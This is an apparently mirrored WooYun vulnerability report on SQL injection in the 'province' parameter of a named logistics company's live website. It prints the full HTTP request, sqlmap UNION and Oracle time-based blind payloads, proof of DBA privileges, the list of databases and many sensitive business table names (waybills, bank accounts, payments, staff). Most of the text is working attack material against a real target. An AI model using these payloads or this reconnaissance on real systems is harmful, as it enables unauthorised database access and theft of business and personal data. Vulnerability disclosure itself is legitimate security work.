乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开
库里的内容还是比较多的,具体有多少还是看漏洞证明吧,懒得打字。
注入点: http://www.sure56.com/bindselect.asp?参数province 未做过滤,存在SQL注入。
POST /bindselect.asp HTTP/1.1Origin: http://www.sure56.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.sure56.com/joinonline.aspAccept: */*Cookie: ASPSESSIONIDQACRBABR=MMEDOGBAJCLCDMOAOHMGFOFK; billcode=94102Content-Length: 40Connection: Keep-aliveAccept-Encoding: gzip,deflateAccept-Language: zh-CN,en,*Host: www.sure56.comPragma: no-cacheCache-Control: no-cacheAcunetix-Aspect: enabledAcunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66cAcunetix-Aspect-Queries: filelist;aspectalertsaction=fillArea&province=姹熻嫃鐪?city=
当前用户、DBA权限证明
Parameter: province (POST) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: action=fillArea&province=江苏??city=' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(118)||CHR(113)||CHR(106)||CHR(113)||CHR(110)||CHR(85)||CHR(103)||CHR(65)||CHR(104)||CHR(85)||CHR(80)||CHR(115)||CHR(87)||CHR(85)||CHR(113)||CHR(118)||CHR(106)||CHR(106)||CHR(113) FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind (comment) Payload: action=fillArea&province=江苏??city=' AND 8295=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(110)||CHR(86)||CHR(71),5)-----[23:51:09] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Oracle[23:51:09] [INFO] fetching current usercurrent user: 'E3NEW'[23:51:09] [INFO] testing if current user is DBAcurrent user is DBA: True
存在的库
available databases [20]:[*] APPQOSSYS[*] ATHENA[*] CTXSYS[*] DBSNMP[*] DMSYS[*] E3DATA[*] E3NEW[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TRANSFER_USER[*] WMSYS[*] XDB
库E3NEW中的表,比较多,摘取一部分,
| TAB_网点班次表 || TAB_网点运单库存余额表 || TAB_网点采购表 || TAB_网点银行账号表 || TAB_网点预付款类型表 || TAB_网络表 || TAB_罚款表 || TAB_罚款表单号 || TAB_考勤日期表 || TAB_考勤时效表 || TAB_考勤机器连接配置表 || TAB_考勤记录表 || TAB_考核信息表 || TAB_职位调动表 || TAB_自定义联系人表 || TAB_航班信息表 || TAB_航空主单表 || TAB_营业网点LOG表 || TAB_营业网点操作类型表 || TAB_营业网点表 || TAB_袋运单子单表 || TAB_解析错误记录表 || TAB_订单来源表 || TAB_订单状态对照表 || TAB_评价类型维护表 || TAB_财付通批量代付表 || TAB_货单状态表 || TAB_货币币别表 || TAB_货款表 || TAB_货款表_NEW || TAB_货款表_TEMP || TAB_费用确认类型表 || TAB_费用确认表 || TAB_车主司机信息表 || TAB_车主司机维护日志表 || TAB_车线利润分析统计表 || TAB_车线利润成本表 || TAB_车线利润成本表_中心 || TAB_车线费用明细表 || TAB_车辆OP记录表 || TAB_车辆信息表 || TAB_车辆实际运行监控表 || TAB_车辆封签记录表 || TAB_车辆班次表 || TAB_车辆类型表 || TAB_车辆线路时效表 || TAB_车辆考勤记录表 || TAB_车辆节点车线表 || TAB_车辆表 || TAB_车辆装载明细表 || TAB_车辆费用表 || TAB_车辆路由表 || TAB_车辆车线中间表 || TAB_车辆运行计划表 || TAB_车队表 || TAB_运单入库品名表 || TAB_运单入库品名表_NEW || TAB_运单入库品名表_NEWAUDIT || TAB_运单库存余额表 || TAB_运单库存余额表_NEW || TAB_运单状态表 || TAB_运单资料表 || TAB_运单资料表_刷重量 || TAB_运输车辆表 || TAB_返回货单表 || TAB_退网停网记录 || TAB_通用报价修改序号 || TAB_通用报价删除记录表 || TAB_通用报价整车表 || TAB_通用报价更新记录表 || TAB_通用报价表 || TAB_通用报价表BLOB_BAK || TAB_通用报价表CLOB || TAB_通用报价表CLOBAUDIT || TAB_通用报价表CLOB_BAK20150826 || TAB_通用报价表承包区 || TAB_通用报价表站点 || TAB_通话记录管理 || TAB_速付通财务确认表 || TAB_速付通费用确认表 || TAB_采购表 || TAB_采购表_NEW || TAB_银行开户地区表 || TAB_错分发件表 || TAB_问题件原因表 || TAB_问题件处理建议表 || TAB_问题件处理表 || TAB_问题件申报表 || TAB_问题件类型 || TAB_问题件类型NEW || TAB_问题件记录表 || TAB_预付款付款方式表 || TAB_预付款余额处理日志表 || TAB_预付款余额待处理表 || TAB_预付款帐套中心表 || TAB_预付款类型表 || TAB_预付款调度日志表 || TAB_预付款转账表 || 代收款手续费 || 代收款比率 || 代收货款手续费对帐比率表 || 公司员工表 || 删除记录表 || 到付款中心对帐比率 || 到付款比率 || 到付款限制规则 || 到付运单资料表 || 区域对照管理表 || 区域表网点调整反馈表 || 巴枪记录表 || 巴枪记录表_OPLOG_DEBUG || 承包区报价表 || 报价权限表 || 报价模板表 || 报价表 || 报关资料表 || 本地自动对帐表 || 管道自动对帐表 || 系统参数表 || 菜单表 || 费用调整登记表 || 车线路由表 || 车辆皮重表 || 车辆表 || 运力表 || AA_BIND || AA_E3NEW || AA_E3WEB || AA_GPRS || AA_HARD |
我也不知道
未能联系到厂商或者厂商积极拒绝